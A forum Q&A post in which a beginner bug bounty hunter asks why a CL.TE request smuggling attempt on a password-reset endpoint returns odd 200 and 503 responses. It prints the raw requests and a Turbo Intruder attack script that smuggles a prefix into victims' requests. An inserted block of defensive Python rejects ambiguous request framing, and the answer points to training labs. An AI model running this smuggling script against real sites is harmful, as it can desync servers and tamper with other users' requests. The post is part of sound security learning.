Strange responses when using Turbo Intruder

Question (votes: 0, answers: 1)

I am a bug bounty hunter and new to it. A few days ago I read about the "request smuggling" vulnerability, and right after that I started looking for it on the internet. Yesterday I found a website that redirects me to https://www.google.com when I add X-Forwarded-Host: google.com to the headers. Exploiting that on its own is very hard, so I thought about combining it with request smuggling. I chose the change-password request as the target:

    POST /my-rx/forgot-password HTTP/1.1
    Host: www.example.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://www.example.com/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 112
    Connection: close
    Cookie: <my_cookie>
    Upgrade-Insecure-Requests: 1

    email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3

I converted it to chunked:

    POST /my-rx/forgot-password HTTP/1.1
    Host: www.example.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://www.example.com/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 112
    Connection: close
    Cookie: <my_cookie>
    Upgrade-Insecure-Requests: 1
    Transfer-Encoding: chunked

    6b
    email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
    0

But when I sent it, it gave me a 503 client read error code. It looks like it does not accept chunked. Still, I wanted to keep going, so I installed the HTTP Request Smuggler and Turbo Intruder extensions in Burp Suite and then launched a smuggling attack (CL.TE). It generated the following Python code for the smuggling attack:

    # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
    def queueRequests(target, wordlists):

        # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=5,
                               requestsPerConnection=1,
                               resumeSSL=False,
                               timeout=10,
                               pipeline=False,
                               maxRetriesPerRequest=0,
                               engine=Engine.THREADED,
                               )

        # This will prefix the victim's request. Edit it to achieve the desired effect.
        prefix = '''GET /hopefully404 HTTP/1.1
    X-Ignore: X'''

        # The request engine will auto-fix the content-length for us
        attack = target.req + prefix
        engine.queue(attack)

        victim = target.req
        for i in range(14):
            engine.queue(victim)
            time.sleep(0.05)


    def handleResponse(req, interesting):
        table.add(req)

Then I ran it with Turbo Intruder. To my surprise, it sent 14 requests, but only 12 of them were 503 and the remaining 2 were 200. In particular, the 200 response headers contained ...transfer-encoding: chunked... . I tried several times and the result was always the same: 1 or 2 requests came back 200. But here is the strange part: in the code the prefix is

    prefix = '''GET /hopefully404 HTTP/1.1
    X-Ignore: X'''

After several tests I think this is not a request smuggling bug, because the response shows it is the response to the original request, not to the prefix in the code (I also tried changing the prefix, but it was still 200, not 400, 404, ... as I expected).

So does anyone (it would have to be a very professional hacker) know which vulnerability I am facing here? Thanks!

security request burp
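The condition the asker is probing, a request that carries both Content-Length and Transfer-Encoding, is exactly what a front-end should refuse to forward rather than resolve on its own. As an added example (my code, not from the question, the answer or Turbo Intruder; the sample requests are constructed), this Python check classifies a raw request's body framing and rejects the ambiguous forms:

```python
# Added example, not from the post: a framing check for raw HTTP/1.1 requests.
# The sample requests are constructed; a gateway would apply this to live traffic.
NORMAL_REQ = ("POST /my-rx/forgot-password HTTP/1.1\r\nHost: www.example.com\r\n"
              "Content-Length: 11\r\n\r\nemail=a%40b")
# Both Content-Length and Transfer-Encoding: the precondition for a CL.TE/TE.CL desync.
AMBIGUOUS_REQ = ("POST /my-rx/forgot-password HTTP/1.1\r\nHost: www.example.com\r\n"
                 "Content-Length: 11\r\nTransfer-Encoding: chunked\r\n\r\n"
                 "b\r\nemail=a%40b\r\n0\r\n\r\n")
# Space before the colon: some servers drop the header, others honour it.
OBFUSCATED_REQ = ("POST /my-rx/forgot-password HTTP/1.1\r\nHost: www.example.com\r\n"
                  "Transfer-Encoding : chunked\r\n\r\nb\r\nemail=a%40b\r\n0\r\n\r\n")


def parse_headers(raw):
    """Return (request line, [(lowercased name, value)]) for a raw request.
    Names are not trimmed, so whitespace smuggled into a name stays visible."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.lower(), value.strip()))
    return lines[0], headers


def framing_verdict(raw):
    """Classify body framing. A gateway should answer every 'reject' with a
    400 instead of guessing; only an unambiguous framing gets forwarded."""
    _, headers = parse_headers(raw)
    if any(ch.isspace() for name, _ in headers for ch in name):
        return "reject: whitespace in header name"
    cl = [v for n, v in headers if n == "content-length"]
    te = [v for n, v in headers if n == "transfer-encoding"]
    if cl and te:
        return "reject: Content-Length and Transfer-Encoding both present"
    if len(set(cl)) > 1 or (cl and not cl[0].isdigit()):
        return "reject: conflicting or non-numeric Content-Length"
    if te:
        # Accept only a single, exact "chunked" token; anything else is suspect.
        codings = [c.strip().lower() for v in te for c in v.split(",")]
        if codings != ["chunked"]:
            return "reject: unsupported or obfuscated Transfer-Encoding"
        return "ok: chunked"
    return "ok: content-length" if cl else "ok: no body"
```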
1 Answer

1 vote
... chunked in TE;CL, but after using the Burp extension you found it is CL;TE, so the problem may lie there. Judging by your post, you are a bit confused; I suggest you work through the PortSwigger HTTP request smuggling labs. I recently completed them myself, and through them your fundamentals will become very strong!
